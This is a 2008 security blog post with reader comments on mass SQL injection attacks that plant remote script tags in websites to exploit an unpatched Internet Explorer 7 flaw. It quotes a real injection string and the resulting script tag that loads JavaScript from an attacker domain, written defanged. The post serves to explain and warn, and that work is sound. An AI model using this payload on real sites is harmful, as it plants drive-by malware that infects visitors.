Research

Application security testing, analysis, and metrics

SQL Injection Tangos with Heap Overflows

Posted by Chris Wysopal in RESEARCH, December 16, 2008 | Comments (3)  

And the results are not graceful.

Unless you have been living under a rock you have heard about the latest Internet Explorer 7 unpatched vulnerability. If you browse a web site that has been modified to contain malicious JavaScript it will download malware to your Windows machine. I first caught wind of it over the weekend when a friend said he was browsing a legitimate training web site when suddenly he saw his Internet Explorer status line change to, “Databinding…”. That will make your pulse quicken. AV was useless in stopping the attack.

Attackers have been finding web sites that have vulnerabilities in them that allow the modification of content on the web site. By far the most popular vulnerability is SQL Injection. Attackers inject a string like the following into a form field:

rtrim(convert(varchar(4000),['+@C+']))+”<script src=http://17gamo [dot] com/1.js></script>”’)FETCH NEXT FROM

They then hope that the data will get read back out of the SQL database at some point and the web app will send the following Javascript to a browser.

<script src=http://17gamo [dot] com/1.js></script>

The victim’s browser then pulls the malicious JavaScript and the browser gets owned. Internet Storm Center has another nice example where the JavaScript is injected as a cookie value.

It Takes Two to Tango

This is an example of a vulnerability where it takes two to tango. Not only does it require a vulnerable client program connecting to untrusted data on the internet. To spread widely, it requires vulnerable web applications that an attacker can use to host the malicious payload. I have also heard of ad servers downloading the malicious payload right along with banner ads for Fortune 500 companies. One of the big lessons here is there is no “safe” area of the internet to browse.

Something that concerns me is the organizations with the vulnerable web applications don’t know it or don’t care. They don’t have the brand damage of a large software company such as Microsoft so thousands of small vulnerable web apps keep serving up the latest and gratest malicious payloads for the latest client vulnerabilities. If it isn’t Internet Explorer, like this week, it might be Firefox or Flash or a media plug in.

Insecure web applications are helping the criminals win.

Written by:

3 Comments »

Great post. There is a third in the tango: cross-site scripting. This is a heap overflow attack, made using a stored cross-site scripting attack made with SQL injection. Yak!

Comment by Miguel Correia — December 17, 2008 @ 1:29 pm

@Miguel

Agreed. Perhaps I should change the title to “IE has a three way with SQL Injection and XSS”.

-Chris

Comment by Chris Wysopal — December 17, 2008 @ 7:26 pm

[...] SQL Injection Tangos with Heap Overflows Multifactor vulnerabilities lead to massive exploits. The scary bit about this is that this points out that the 500,000 or so IIS servers that got hit with SQL injection attacks are, if they remain unpatched, fertile ground for exploiting just about any other vulnerability that comes around. (tags: security sqlinjection) [...]

Pingback by links for 2008-12-17 (Jarrett House North) — December 17, 2008 @ 9:01 pm

RSS feed for comments on this post. TrackBack URI

Leave a comment


Schedule Demo Veracode Trial
Mobile Security

Sql Injection

cyber security

Categories

Archive

Powered by WordPress